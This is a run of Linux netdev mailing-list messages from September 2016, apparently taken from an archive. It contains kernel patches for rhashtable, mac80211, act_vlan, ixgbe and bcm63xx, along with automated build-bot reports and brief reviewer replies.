@@ -116,8 +116,8 @@ static void *tcf_csum_skb_nextlayer(struct sk_buff *skb,
return (void *)(skb_network_header(skb) + ihl);
 }
 
-static int tcf_csum_ipv4_icmp(struct sk_buff *skb,
- unsigned int ihl, unsigned int ipl)
+static int tcf_csum_ipv4_icmp(struct sk_buff *skb, unsigned int ihl,
+ unsigned int ipl)
 {
struct icmphdr *icmph;
 
@@ -152,8 +152,8 @@ static int tcf_csum_ipv4_igmp(struct sk_buff *skb,
return 1;
 }
 
-static int tcf_csum_ipv6_icmp(struct sk_buff *skb,
- unsigned int ihl, unsigned int ipl)
+static int tcf_csum_ipv6_icmp(struct sk_buff *skb, unsigned int ihl,
+ unsigned int ipl)
 {
struct icmp6hdr *icmp6h;
const struct ipv6hdr *ip6h;
@@ -174,8 +174,8 @@ static int tcf_csum_ipv6_icmp(struct sk_buff *skb,
return 1;
 }
 
-static int tcf_csum_ipv4_tcp(struct sk_buff *skb,
-unsigned int ihl, unsigned int ipl)
+static int tcf_csum_ipv4_tcp(struct sk_buff *skb, unsigned int ihl,
+unsigned int ipl)
 {
struct tcphdr *tcph;
const struct iphdr *iph;
@@ -195,8 +195,8 @@ static int tcf_csum_ipv4_tcp(struct sk_buff *skb,
return 1;
 }
 
-static int tcf_csum_ipv6_tcp(struct sk_buff *skb,
-unsigned int ihl, unsigned int ipl)
+static int tcf_csum_ipv6_tcp(struct sk_buff *skb, unsigned int ihl,
+unsigned int ipl)
 {
struct tcphdr *tcph;
const struct ipv6hdr *ip6h;
@@ -217,8 +217,8 @@ static int tcf_csum_ipv6_tcp(struct sk_buff *skb,
return 1;
 }
 
-static int tcf_csum_ipv4_udp(struct sk_buff *skb,
-unsigned int ihl, unsigned int ipl, int udplite)
+static int tcf_csum_ipv4_udp(struct sk_buff *skb, unsigned int ihl,
+unsigned int ipl, int udplite)
 {
struct udphdr *udph;
const struct iphdr *iph;
@@ -270,8 +270,8 @@ ignore_obscure_skb:
return 1;
 }
 
-static int tcf_csum_ipv6_udp(struct sk_buff *skb,
-unsigned int ihl, unsigned int ipl, int udplite)
+static int tcf_csum_ipv6_udp(struct sk_buff *skb, unsigned int ihl,
+unsigned int ipl, int udplite)
 {
struct udphdr *udph;
const struct ipv6hdr *ip6h;

[PATCH 1/1] ixgbe: replace defined with IS_ENABLED

2016-09-18 Thread zyjzyj2000

From: Zhu Yanjun 

Replace defined macro with IS_ENABLED in ixgbe.h file

Signed-off-by: Zhu Yanjun 
---
 drivers/net/ethernet/intel/ixgbe/ixgbe.h | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/drivers/net/ethernet/intel/ixgbe/ixgbe.h 
b/drivers/net/ethernet/intel/ixgbe/ixgbe.h
index 9475ff9..f8bc1d0 100644
--- a/drivers/net/ethernet/intel/ixgbe/ixgbe.h
+++ b/drivers/net/ethernet/intel/ixgbe/ixgbe.h
@@ -45,7 +45,7 @@
 #include "ixgbe_type.h"
 #include "ixgbe_common.h"
 #include "ixgbe_dcb.h"
-#if defined(CONFIG_FCOE) || defined(CONFIG_FCOE_MODULE)
+#if IS_ENABLED(CONFIG_FCOE)
 #define IXGBE_FCOE
 #include "ixgbe_fcoe.h"
 #endif /* CONFIG_FCOE or CONFIG_FCOE_MODULE */
-- 
2.7.4

Re: [PATCH v2 net-next 2/2] net sched ife action: Introduce skb tcindex metadata encap decap

2016-09-18 Thread kbuild test robot

Hi Jamal,

[auto build test ERROR on net-next/master]

url:
https://github.com/0day-ci/linux/commits/Jamal-Hadi-Salim/net-sched-ife-action-add-16-bit-helpers/20160918-192521
config: i386-allmodconfig (attached as .config)
compiler: gcc-6 (Debian 6.2.0-3) 6.2.0 20160901
reproduce:
# save the attached .config to linux build tree
make ARCH=i386 

All errors (new ones prefixed by >>):

>> make[3]: *** No rule to make target 'net/sched/act_meta_skbtcindex.c', 
>> needed by 'net/sched/act_meta_skbtcindex.o'.
   make[3]: Target '__build' not remade because of errors.

---
0-DAY kernel test infrastructureOpen Source Technology Center
https://lists.01.org/pipermail/kbuild-all   Intel Corporation


.config.gz
Description: application/gzip

[PATCH 0/2] rhashtable: rhashtable with duplicate objects

2016-09-18 Thread Herbert Xu

On Fri, Aug 05, 2016 at 12:50:33PM +0200, Johannes Berg wrote:
> > My plan is to build support for this directly into rhashtable.
> > So I'm adding a struct rhlist_head that would be used in place
> > of rhash_head for these cases and it'll carry an extra pointer
> > for the list of identical entries.
> > 
> > I will then add an additional layer of insert/lookup interfaces
> > for rhlist_head.
> 
> Oh, ok.

OK, it's finally ready now.

This series contains one two patches.  The first adds the rhlist
interface and the second converts mac80211 to use it.  If this works
out I'll then proceed to convert the other insecure_elasticity
users over to this.

I've tested the rhlist code with test_rhashtable but I haven't
tested the mac80211 conversion.  So please give it a go and see
if it still works.

Thanks!
-- 
Email: Herbert Xu 
Home Page: http://gondor.apana.org.au/~herbert/
PGP Key: http://gondor.apana.org.au/~herbert/pubkey.txt

[PATCH 1/2] rhashtable: Add rhlist interface

2016-09-18 Thread Herbert Xu

The insecure_elasticity setting is an ugly wart brought out by
users who need to insert duplicate objects (that is, distinct
objects with identical keys) into the same table.

In fact, those users have a much bigger problem.  Once those
duplicate objects are inserted, they don't have an interface to
find them (unless you count the walker interface which walks
over the entire table).

Some users have resorted to doing a manual walk over the hash
table which is of course broken because they don't handle the
potential existence of multiple hash tables.  The result is that
they will break sporadically when they encounter a hash table
resize/rehash.

This patch provides a way out for those users, at the expense
of an extra pointer per object.  Essentially each object is now
a list of objects carrying the same key.  The hash table will
only see the lists so nothing changes as far as rhashtable is
concerned.

To use this new interface, you need to insert a struct rhlist_head
into your objects instead of struct rhash_head.  While the hash
table is unchanged, for type-safety you'll need to use struct
rhltable instead of struct rhashtable.  All the existing interfaces
have been duplicated for rhlist, including the hash table walker.

One missing feature is nulls marking because AFAIK the only potential
user of it does not need duplicate objects.  Should anyone need
this it shouldn't be too hard to add.

Signed-off-by: Herbert Xu 
---

 include/linux/rhashtable.h |  490 ++---
 lib/rhashtable.c   |  231 -
 2 files changed, 560 insertions(+), 161 deletions(-)

diff --git a/include/linux/rhashtable.h b/include/linux/rhashtable.h
index fd82584..dc7bea6 100644
--- a/include/linux/rhashtable.h
+++ b/include/linux/rhashtable.h
@@ -1,7 +1,7 @@
 /*
  * Resizable, Scalable, Concurrent Hash Table
  *
- * Copyright (c) 2015 Herbert Xu 
+ * Copyright (c) 2015-2016 Herbert Xu 
  * Copyright (c) 2014-2015 Thomas Graf 
  * Copyright (c) 2008-2014 Patrick McHardy 
  *
@@ -53,6 +53,11 @@ struct rhash_head {
struct rhash_head __rcu *next;
 };
 
+struct rhlist_head {
+   struct rhash_head   rhead;
+   struct rhlist_head __rcu*next;
+};
+
 /**
  * struct bucket_table - Table of hash buckets
  * @size: Number of hash buckets
@@ -137,6 +142,7 @@ struct rhashtable_params {
  * @key_len: Key length for hashfn
  * @elasticity: Maximum chain length before rehash
  * @p: Configuration parameters
+ * @rhlist: True if this is an rhltable
  * @run_work: Deferred worker to expand/shrink asynchronously
  * @mutex: Mutex to protect current/future table swapping
  * @lock: Spin lock to protect walker list
@@ -147,12 +153,21 @@ struct rhashtable {
unsigned intkey_len;
unsigned intelasticity;
struct rhashtable_paramsp;
+   boolrhlist;
struct work_struct  run_work;
struct mutexmutex;
spinlock_t  lock;
 };
 
 /**
+ * struct rhltable - Hash table with duplicate objects in a list
+ * @ht: Underlying rhtable
+ */
+struct rhltable {
+   struct rhashtable ht;
+};
+
+/**
  * struct rhashtable_walker - Hash table walker
  * @list: List entry on list of walkers
  * @tbl: The table that we were walking over
@@ -163,9 +178,10 @@ struct rhashtable_walker {
 };
 
 /**
- * struct rhashtable_iter - Hash table iterator, fits into netlink cb
+ * struct rhashtable_iter - Hash table iterator
  * @ht: Table to iterate through
  * @p: Current pointer
+ * @list: Current hash list pointer
  * @walker: Associated rhashtable walker
  * @slot: Current slot
  * @skip: Number of entries to skip in slot
@@ -173,6 +189,7 @@ struct rhashtable_walker {
 struct rhashtable_iter {
struct rhashtable *ht;
struct rhash_head *p;
+   struct rhlist_head *list;
struct rhashtable_walker walker;
unsigned int slot;
unsigned int skip;
@@ -339,13 +356,11 @@ static inline int lockdep_rht_bucket_is_held(const struct 
bucket_table *tbl,
 
 int rhashtable_init(struct rhashtable *ht,
const struct rhashtable_params *params);
+int rhltable_init(struct rhltable *hlt,
+ const struct rhashtable_params *params);
 
-struct bucket_table *rhashtable_insert_slow(struct rhashtable *ht,
-   const void *key,
-   struct rhash_head *obj,
-   struct bucket_table *old_tbl,
-   void **data);
-int rhashtable_insert_rehash(struct rhashtable *ht, struct bucket_table *tbl);
+void *rhashtable_insert_slow(struct rhashtable *ht, const void *key,
+struct rhash_head *obj);
 
 void rhashtable_walk_enter(struct rhashtable *ht,
   struct rhashtable_iter *ite

[PATCH 2/2] mac80211: Use rhltable instead of rhashtable

2016-09-18 Thread Herbert Xu

mac80211 currently uses rhashtable with insecure_elasticity set
to true.  The latter is because of duplicate objects.  What's
more, mac80211 walks the rhashtable chains by hand which is broken
as rhashtable may contain multiple tables due to resizing or
rehashing.

This patch fixes it by converting it to the newly added rhltable
interface which is designed for use with duplicate objects.

With rhltable a lookup returns a list of objects instead of a
single one.  This is then fed into the existing for_each_sta_info
macro.

This patch also deletes the sta_addr_hash function since rhashtable
defaults to jhash.

Signed-off-by: Herbert Xu 
---

 net/mac80211/ieee80211_i.h |2 -
 net/mac80211/rx.c  |7 +-
 net/mac80211/sta_info.c|   52 ++---
 net/mac80211/sta_info.h|   19 ++--
 net/mac80211/status.c  |7 +-
 5 files changed, 33 insertions(+), 54 deletions(-)

diff --git a/net/mac80211/ieee80211_i.h b/net/mac80211/ieee80211_i.h
index f56d342..1a52cd4 100644
--- a/net/mac80211/ieee80211_i.h
+++ b/net/mac80211/ieee80211_i.h
@@ -1208,7 +1208,7 @@ struct ieee80211_local {
spinlock_t tim_lock;
unsigned long num_sta;
struct list_head sta_list;
-   struct rhashtable sta_hash;
+   struct rhltable sta_hash;
struct timer_list sta_cleanup;
int sta_generation;
 
diff --git a/net/mac80211/rx.c b/net/mac80211/rx.c
index 9dce3b1..5e26dc6 100644
--- a/net/mac80211/rx.c
+++ b/net/mac80211/rx.c
@@ -3940,7 +3940,7 @@ static void __ieee80211_rx_handle_packet(struct 
ieee80211_hw *hw,
__le16 fc;
struct ieee80211_rx_data rx;
struct ieee80211_sub_if_data *prev;
-   struct rhash_head *tmp;
+   struct rhlist_head *tmp;
int err = 0;
 
fc = ((struct ieee80211_hdr *)skb->data)->frame_control;
@@ -3983,13 +3983,10 @@ static void __ieee80211_rx_handle_packet(struct 
ieee80211_hw *hw,
goto out;
} else if (ieee80211_is_data(fc)) {
struct sta_info *sta, *prev_sta;
-   const struct bucket_table *tbl;
 
prev_sta = NULL;
 
-   tbl = rht_dereference_rcu(local->sta_hash.tbl, 
&local->sta_hash);
-
-   for_each_sta_info(local, tbl, hdr->addr2, sta, tmp) {
+   for_each_sta_info(local, hdr->addr2, sta, tmp) {
if (!prev_sta) {
prev_sta = sta;
continue;
diff --git a/net/mac80211/sta_info.c b/net/mac80211/sta_info.c
index 19f14c9..198d0bd 100644
--- a/net/mac80211/sta_info.c
+++ b/net/mac80211/sta_info.c
@@ -67,12 +67,10 @@
 
 static const struct rhashtable_params sta_rht_params = {
.nelem_hint = 3, /* start small */
-   .insecure_elasticity = true, /* Disable chain-length checks. */
.automatic_shrinking = true,
.head_offset = offsetof(struct sta_info, hash_node),
.key_offset = offsetof(struct sta_info, addr),
.key_len = ETH_ALEN,
-   .hashfn = sta_addr_hash,
.max_size = CONFIG_MAC80211_STA_HASH_MAX_SIZE,
 };
 
@@ -80,8 +78,8 @@ static const struct rhashtable_params sta_rht_params = {
 static int sta_info_hash_del(struct ieee80211_local *local,
 struct sta_info *sta)
 {
-   return rhashtable_remove_fast(&local->sta_hash, &sta->hash_node,
- sta_rht_params);
+   return rhltable_remove(&local->sta_hash, &sta->hash_node,
+  sta_rht_params);
 }
 
 static void __cleanup_single_sta(struct sta_info *sta)
@@ -157,19 +155,22 @@ static void cleanup_single_sta(struct sta_info *sta)
sta_info_free(local, sta);
 }
 
+struct rhlist_head *sta_info_hash_lookup(struct ieee80211_local *local,
+const u8 *addr)
+{
+   return rhltable_lookup(&local->sta_hash, addr, sta_rht_params);
+}
+
 /* protected by RCU */
 struct sta_info *sta_info_get(struct ieee80211_sub_if_data *sdata,
  const u8 *addr)
 {
struct ieee80211_local *local = sdata->local;
+   struct rhlist_head *tmp;
struct sta_info *sta;
-   struct rhash_head *tmp;
-   const struct bucket_table *tbl;
 
rcu_read_lock();
-   tbl = rht_dereference_rcu(local->sta_hash.tbl, &local->sta_hash);
-
-   for_each_sta_info(local, tbl, addr, sta, tmp) {
+   for_each_sta_info(local, addr, sta, tmp) {
if (sta->sdata == sdata) {
rcu_read_unlock();
/* this is safe as the caller must already hold
@@ -190,14 +191,11 @@ struct sta_info *sta_info_get_bss(struct 
ieee80211_sub_if_data *sdata,
  const u8 *addr)
 {
struct ieee80211_local *local = sdata->local;
+   struct rhlist_head *tmp;
struct sta_info *sta;
-   struct rhash_head *tmp;
-   const struct bucket_table *tbl;

Re: [PATCH v2 net-next 2/2] net sched ife action: Introduce skb tcindex metadata encap decap

2016-09-18 Thread Jamal Hadi Salim


On 16-09-18 09:45 AM, kbuild test robot wrote:

Hi Jamal,

[auto build test ERROR on net-next/master]


Hi monsieur/madame Bot,

fixed in v3.

cheers,
jamal

Re: [PATCH 2/2] iw_cxgb4: add fast-path for small REG_MR operations

2016-09-18 Thread Leon Romanovsky

On Fri, Sep 16, 2016 at 07:54:52AM -0700, Steve Wise wrote:
> When processing a REG_MR work request, if fw supports the
> FW_RI_NSMR_TPTE_WR work request, and if the page list for this
> registration is <= 2 pages, and the current state of the mr is INVALID,
> then use FW_RI_NSMR_TPTE_WR to pass down a fully populated TPTE for FW
> to write.  This avoids FW having to do an async read of the TPTE blocking
> the SQ until the read completes.
>
> To know if the current MR state is INVALID or not, iw_cxgb4 must track the
> state of each fastreg MR.  The c4iw_mr struct state is updated as REG_MR
> and LOCAL_INV WRs are posted and completed, when a reg_mr is destroyed,
> and when RECV completions are processed that include a local invalidation.
>
> This optimization increases small IO IOPS for both iSER and NVMF.
>
> Signed-off-by: Steve Wise 
> ---

<...>

> +   struct ib_reg_wr *wr, struct c4iw_mr *mhp,
> +   u8 *len16)
> +{
> + __be64 *p = (__be64 *)fr->pbl;
> +
> + fr->r2 = cpu_to_be32(0);

Is there any difference between the line above and "fr->r2 = 0"?


signature.asc
Description: PGP signature

[PATCH net-next 1/2] net: skbuff: Export __skb_vlan_pop

2016-09-18 Thread Shmulik Ladkani

This exports the functionality of extracting the tag from the payload,
without moving next vlan tag into hw accel tag.

Signed-off-by: Shmulik Ladkani 
---
 include/linux/skbuff.h | 1 +
 net/core/skbuff.c  | 7 +--
 2 files changed, 6 insertions(+), 2 deletions(-)

diff --git a/include/linux/skbuff.h b/include/linux/skbuff.h
index 4c5662f05b..000c5301b8 100644
--- a/include/linux/skbuff.h
+++ b/include/linux/skbuff.h
@@ -3075,6 +3075,7 @@ bool skb_gso_validate_mtu(const struct sk_buff *skb, 
unsigned int mtu);
 struct sk_buff *skb_segment(struct sk_buff *skb, netdev_features_t features);
 struct sk_buff *skb_vlan_untag(struct sk_buff *skb);
 int skb_ensure_writable(struct sk_buff *skb, int write_len);
+int __skb_vlan_pop(struct sk_buff *skb, u16 *vlan_tci);
 int skb_vlan_pop(struct sk_buff *skb);
 int skb_vlan_push(struct sk_buff *skb, __be16 vlan_proto, u16 vlan_tci);
 struct sk_buff *pskb_extract(struct sk_buff *skb, int off, int to_copy,
diff --git a/net/core/skbuff.c b/net/core/skbuff.c
index cc2c004838..2937088844 100644
--- a/net/core/skbuff.c
+++ b/net/core/skbuff.c
@@ -4493,8 +4493,10 @@ int skb_ensure_writable(struct sk_buff *skb, int 
write_len)
 }
 EXPORT_SYMBOL(skb_ensure_writable);
 
-/* remove VLAN header from packet and update csum accordingly. */
-static int __skb_vlan_pop(struct sk_buff *skb, u16 *vlan_tci)
+/* remove VLAN header from packet and update csum accordingly.
+ * expects a non skb_vlan_tag_present skb with a vlan tag payload
+ */
+int __skb_vlan_pop(struct sk_buff *skb, u16 *vlan_tci)
 {
struct vlan_hdr *vhdr;
unsigned int offset = skb->data - skb_mac_header(skb);
@@ -4525,6 +4527,7 @@ pull:
 
return err;
 }
+EXPORT_SYMBOL(__skb_vlan_pop);
 
 int skb_vlan_pop(struct sk_buff *skb)
 {
-- 
2.7.4

[PATCH net-next 2/2] net/sched: act_vlan: Introduce TCA_VLAN_ACT_MODIFY vlan action

2016-09-18 Thread Shmulik Ladkani

TCA_VLAN_ACT_MODIFY allows one to change an existing tag.

It accepts same attributes as TCA_VLAN_ACT_PUSH (protocol, id,
priority).
If packet is vlan tagged, then the tag gets overwritten according to
user specified attributes.

For example, this allows user to replace a tag's vid while preserving
its priority bits (as opposed to "action vlan pop pipe action vlan push").

Signed-off-by: Shmulik Ladkani 
---
 include/uapi/linux/tc_act/tc_vlan.h |  1 +
 net/sched/act_vlan.c| 29 -
 2 files changed, 29 insertions(+), 1 deletion(-)

diff --git a/include/uapi/linux/tc_act/tc_vlan.h 
b/include/uapi/linux/tc_act/tc_vlan.h
index be72b6e384..bddb272b84 100644
--- a/include/uapi/linux/tc_act/tc_vlan.h
+++ b/include/uapi/linux/tc_act/tc_vlan.h
@@ -16,6 +16,7 @@
 
 #define TCA_VLAN_ACT_POP   1
 #define TCA_VLAN_ACT_PUSH  2
+#define TCA_VLAN_ACT_MODIFY3
 
 struct tc_vlan {
tc_gen;
diff --git a/net/sched/act_vlan.c b/net/sched/act_vlan.c
index 59a8d3150a..e5eeaa7a01 100644
--- a/net/sched/act_vlan.c
+++ b/net/sched/act_vlan.c
@@ -30,6 +30,7 @@ static int tcf_vlan(struct sk_buff *skb, const struct 
tc_action *a,
struct tcf_vlan *v = to_vlan(a);
int action;
int err;
+   u16 tci;
 
spin_lock(&v->tcf_lock);
tcf_lastuse_update(&v->tcf_tm);
@@ -48,6 +49,30 @@ static int tcf_vlan(struct sk_buff *skb, const struct 
tc_action *a,
if (err)
goto drop;
break;
+   case TCA_VLAN_ACT_MODIFY:
+   if (!skb_vlan_tagged(skb))
+   goto unlock;
+   /* extract existing tag (and guarantee no hwaccel tag) */
+   if (skb_vlan_tag_present(skb)) {
+   tci = skb_vlan_tag_get(skb);
+   skb->vlan_tci = 0;
+   } else {
+   if (skb->mac_len < VLAN_ETH_HLEN)
+   goto unlock;
+   err = __skb_vlan_pop(skb, &tci);
+   if (err)
+   goto drop;
+   }
+   /* replace the vid */
+   tci = (tci & ~VLAN_VID_MASK) | v->tcfv_push_vid;
+   /* replace prio bits, if tcfv_push_prio specified */
+   if (v->tcfv_push_prio) {
+   tci &= ~VLAN_PRIO_MASK;
+   tci |= v->tcfv_push_prio << VLAN_PRIO_SHIFT;
+   }
+   /* put updated tci as hwaccel tag */
+   __vlan_hwaccel_put_tag(skb, v->tcfv_push_proto, tci);
+   break;
default:
BUG();
}
@@ -102,6 +127,7 @@ static int tcf_vlan_init(struct net *net, struct nlattr 
*nla,
case TCA_VLAN_ACT_POP:
break;
case TCA_VLAN_ACT_PUSH:
+   case TCA_VLAN_ACT_MODIFY:
if (!tb[TCA_VLAN_PUSH_VLAN_ID]) {
if (exists)
tcf_hash_release(*a, bind);
@@ -185,7 +211,8 @@ static int tcf_vlan_dump(struct sk_buff *skb, struct 
tc_action *a,
if (nla_put(skb, TCA_VLAN_PARMS, sizeof(opt), &opt))
goto nla_put_failure;
 
-   if (v->tcfv_action == TCA_VLAN_ACT_PUSH &&
+   if ((v->tcfv_action == TCA_VLAN_ACT_PUSH ||
+v->tcfv_action == TCA_VLAN_ACT_MODIFY) &&
(nla_put_u16(skb, TCA_VLAN_PUSH_VLAN_ID, v->tcfv_push_vid) ||
 nla_put_be16(skb, TCA_VLAN_PUSH_VLAN_PROTOCOL,
  v->tcfv_push_proto) ||
-- 
2.7.4

[PATCH net-next 0/2] act_vlan: Introduce TCA_VLAN_ACT_MODIFY vlan action

2016-09-18 Thread Shmulik Ladkani

TCA_VLAN_ACT_MODIFY allows one to change an existing tag.

It accepts same attributes as TCA_VLAN_ACT_PUSH (protocol, id,
priority).
If packet is vlan tagged, then the tag gets overwritten according to
user specified attributes.

For example, this allows user to replace a tag's vid while preserving
its priority bits (as opposed to "action vlan pop pipe action vlan push").

Shmulik Ladkani (2):
  net: skbuff: Export __skb_vlan_pop
  net/sched: act_vlan: Introduce TCA_VLAN_ACT_MODIFY vlan action

 include/linux/skbuff.h  |  1 +
 include/uapi/linux/tc_act/tc_vlan.h |  1 +
 net/core/skbuff.c   |  7 +--
 net/sched/act_vlan.c| 29 -
 4 files changed, 35 insertions(+), 3 deletions(-)

-- 
2.7.4

Re: [net-next PATCH] net: netlink messages for HW addr programming

2016-09-18 Thread Roopa Prabhu

On 9/15/16, 9:48 AM, Patrick Ruddy wrote:
> Add RTM_NEWADDR and RTM_DELADDR netlink messages with family
> AF_UNSPEC to indicate interest in specific unicast and multicast
> hardware addresses. These messages are sent when addresses are
> added or deleted from the appropriate interface driver.
> Added AF_UNSPEC GETADDR function to allow the netlink notifications
> to be replayed to avoid loss of state due to application start
> ordering or restart.
>
> Signed-off-by: Patrick Ruddy 
> ---

RTM_NEWADDR and RTM_DELADDR are not used to add these entries to the kernel.
so, it seems a bit wrong to use RTM_NEWADDR and RTM_DELADDR to notify them to
userspace and also to request a special dump of these addresses.

This could just be a new nested netlink attribute in the existing link dump ?

[net-next:master 136/385] net/sched/cls_route.c:565:22-26: ERROR: f is NULL but dereferenced.

2016-09-18 Thread kbuild test robot

tree:   https://git.kernel.org/pub/scm/linux/kernel/git/davem/net-next.git 
master
head:   fd9527f404d51e50f40dac0d9a69f2eff3dac33e
commit: b9a24bb76bf611a5268ceffe04219e6ad264559b [136/385] net_sched: properly 
handle failure case of tcf_exts_init()


coccinelle warnings: (new ones prefixed by >>)

>> net/sched/cls_route.c:565:22-26: ERROR: f is NULL but dereferenced.

vim +565 net/sched/cls_route.c

   549  *fp = f->next;
   550  break;
   551  }
   552  }
   553  }
   554  }
   555  
   556  route4_reset_fastmap(head);
   557  *arg = (unsigned long)f;
   558  if (fold) {
   559  tcf_unbind_filter(tp, &fold->res);
   560  call_rcu(&fold->rcu, route4_delete_filter);
   561  }
   562  return 0;
   563  
   564  errout:
 > 565  tcf_exts_destroy(&f->exts);
   566  kfree(f);
   567  return err;
   568  }
   569  
   570  static void route4_walk(struct tcf_proto *tp, struct tcf_walker *arg)
   571  {
   572  struct route4_head *head = rtnl_dereference(tp->root);
   573  unsigned int h, h1;

---
0-DAY kernel test infrastructureOpen Source Technology Center
https://lists.01.org/pipermail/kbuild-all   Intel Corporation

[PATCH 2/2] net: ethernet: broadcom: bcm63xx: use new api ethtool_{get|set}_link_ksettings

2016-09-18 Thread Philippe Reynes

The ethtool api {get|set}_settings is deprecated.
We move this driver to new api {get|set}_link_ksettings.

Signed-off-by: Philippe Reynes 
---
 drivers/net/ethernet/broadcom/bcm63xx_enet.c |   52 ++
 1 files changed, 28 insertions(+), 24 deletions(-)

diff --git a/drivers/net/ethernet/broadcom/bcm63xx_enet.c 
b/drivers/net/ethernet/broadcom/bcm63xx_enet.c
index 082f3f0..ae364c7 100644
--- a/drivers/net/ethernet/broadcom/bcm63xx_enet.c
+++ b/drivers/net/ethernet/broadcom/bcm63xx_enet.c
@@ -1442,39 +1442,40 @@ static int bcm_enet_nway_reset(struct net_device *dev)
return -EOPNOTSUPP;
 }
 
-static int bcm_enet_get_settings(struct net_device *dev,
-struct ethtool_cmd *cmd)
+static int bcm_enet_get_link_ksettings(struct net_device *dev,
+  struct ethtool_link_ksettings *cmd)
 {
struct bcm_enet_priv *priv;
+   u32 supported, advertising;
 
priv = netdev_priv(dev);
 
-   cmd->maxrxpkt = 0;
-   cmd->maxtxpkt = 0;
-
if (priv->has_phy) {
if (!dev->phydev)
return -ENODEV;
-   return phy_ethtool_gset(dev->phydev, cmd);
+   return phy_ethtool_ksettings_get(dev->phydev, cmd);
} else {
-   cmd->autoneg = 0;
-   ethtool_cmd_speed_set(cmd, ((priv->force_speed_100)
-   ? SPEED_100 : SPEED_10));
-   cmd->duplex = (priv->force_duplex_full) ?
+   cmd->base.autoneg = 0;
+   cmd->base.speed = (priv->force_speed_100) ?
+   SPEED_100 : SPEED_10;
+   cmd->base.duplex = (priv->force_duplex_full) ?
DUPLEX_FULL : DUPLEX_HALF;
-   cmd->supported = ADVERTISED_10baseT_Half  |
+   supported = ADVERTISED_10baseT_Half |
ADVERTISED_10baseT_Full |
ADVERTISED_100baseT_Half |
ADVERTISED_100baseT_Full;
-   cmd->advertising = 0;
-   cmd->port = PORT_MII;
-   cmd->transceiver = XCVR_EXTERNAL;
+   advertising = 0;
+   ethtool_convert_legacy_u32_to_link_mode(
+   cmd->link_modes.supported, supported);
+   ethtool_convert_legacy_u32_to_link_mode(
+   cmd->link_modes.advertising, advertising);
+   cmd->base.port = PORT_MII;
}
return 0;
 }
 
-static int bcm_enet_set_settings(struct net_device *dev,
-struct ethtool_cmd *cmd)
+static int bcm_enet_set_link_ksettings(struct net_device *dev,
+  const struct ethtool_link_ksettings *cmd)
 {
struct bcm_enet_priv *priv;
 
@@ -1482,16 +1483,19 @@ static int bcm_enet_set_settings(struct net_device *dev,
if (priv->has_phy) {
if (!dev->phydev)
return -ENODEV;
-   return phy_ethtool_sset(dev->phydev, cmd);
+   return phy_ethtool_ksettings_set(dev->phydev, cmd);
} else {
 
-   if (cmd->autoneg ||
-   (cmd->speed != SPEED_100 && cmd->speed != SPEED_10) ||
-   cmd->port != PORT_MII)
+   if (cmd->base.autoneg ||
+   (cmd->base.speed != SPEED_100 &&
+cmd->base.speed != SPEED_10) ||
+   cmd->base.port != PORT_MII)
return -EINVAL;
 
-   priv->force_speed_100 = (cmd->speed == SPEED_100) ? 1 : 0;
-   priv->force_duplex_full = (cmd->duplex == DUPLEX_FULL) ? 1 : 0;
+   priv->force_speed_100 =
+   (cmd->base.speed == SPEED_100) ? 1 : 0;
+   priv->force_duplex_full =
+   (cmd->base.duplex == DUPLEX_FULL) ? 1 : 0;
 
if (netif_running(dev))
bcm_enet_adjust_link(dev);
@@ -1585,14 +1589,14 @@ static const struct ethtool_ops bcm_enet_ethtool_ops = {
.get_sset_count = bcm_enet_get_sset_count,
.get_ethtool_stats  = bcm_enet_get_ethtool_stats,
.nway_reset = bcm_enet_nway_reset,
-   .get_settings   = bcm_enet_get_settings,
-   .set_settings   = bcm_enet_set_settings,
.get_drvinfo= bcm_enet_get_drvinfo,
.get_link   = ethtool_op_get_link,
.get_ringparam  = bcm_enet_get_ringparam,
.set_ringparam  = bcm_enet_set_ringparam,
.get_pauseparam = bcm_enet_get_pauseparam,
.set_pauseparam = bcm_enet_set_pauseparam,
+   .get_link_ksettings = bcm_enet_get_link_ksettings,
+   .set_link_ksettings = bcm_enet_set_link_ksettings,
 };
 
 static int bcm_enet_ioctl(struct net_device *dev, struct ifreq *rq, int cmd)
-- 
1.7.4.4

[PATCH 1/2] net: ethernet: broadcom: bcm63xx: use phydev from struct net_device

2016-09-18 Thread Philippe Reynes

The private structure contain a pointer to phydev, but the structure
net_device already contain such pointer. So we can remove the pointer
phydev in the private structure, and update the driver to use the
one contained in struct net_device.

Signed-off-by: Philippe Reynes 
---
 drivers/net/ethernet/broadcom/bcm63xx_enet.c |   31 +++--
 drivers/net/ethernet/broadcom/bcm63xx_enet.h |1 -
 2 files changed, 14 insertions(+), 18 deletions(-)

diff --git a/drivers/net/ethernet/broadcom/bcm63xx_enet.c 
b/drivers/net/ethernet/broadcom/bcm63xx_enet.c
index 6c8bc5f..082f3f0 100644
--- a/drivers/net/ethernet/broadcom/bcm63xx_enet.c
+++ b/drivers/net/ethernet/broadcom/bcm63xx_enet.c
@@ -791,7 +791,7 @@ static void bcm_enet_adjust_phy_link(struct net_device *dev)
int status_changed;
 
priv = netdev_priv(dev);
-   phydev = priv->phydev;
+   phydev = dev->phydev;
status_changed = 0;
 
if (priv->old_link != phydev->link) {
@@ -913,7 +913,6 @@ static int bcm_enet_open(struct net_device *dev)
priv->old_link = 0;
priv->old_duplex = -1;
priv->old_pause = -1;
-   priv->phydev = phydev;
}
 
/* mask all interrupts and request them */
@@ -1085,7 +1084,7 @@ static int bcm_enet_open(struct net_device *dev)
 ENETDMAC_IRMASK, priv->tx_chan);
 
if (priv->has_phy)
-   phy_start(priv->phydev);
+   phy_start(phydev);
else
bcm_enet_adjust_link(dev);
 
@@ -1127,7 +1126,7 @@ out_freeirq:
free_irq(dev->irq, dev);
 
 out_phy_disconnect:
-   phy_disconnect(priv->phydev);
+   phy_disconnect(phydev);
 
return ret;
 }
@@ -1190,7 +1189,7 @@ static int bcm_enet_stop(struct net_device *dev)
netif_stop_queue(dev);
napi_disable(&priv->napi);
if (priv->has_phy)
-   phy_stop(priv->phydev);
+   phy_stop(dev->phydev);
del_timer_sync(&priv->rx_timeout);
 
/* mask all interrupts */
@@ -1234,10 +1233,8 @@ static int bcm_enet_stop(struct net_device *dev)
free_irq(dev->irq, dev);
 
/* release phy */
-   if (priv->has_phy) {
-   phy_disconnect(priv->phydev);
-   priv->phydev = NULL;
-   }
+   if (priv->has_phy)
+   phy_disconnect(dev->phydev);
 
return 0;
 }
@@ -1437,9 +1434,9 @@ static int bcm_enet_nway_reset(struct net_device *dev)
 
priv = netdev_priv(dev);
if (priv->has_phy) {
-   if (!priv->phydev)
+   if (!dev->phydev)
return -ENODEV;
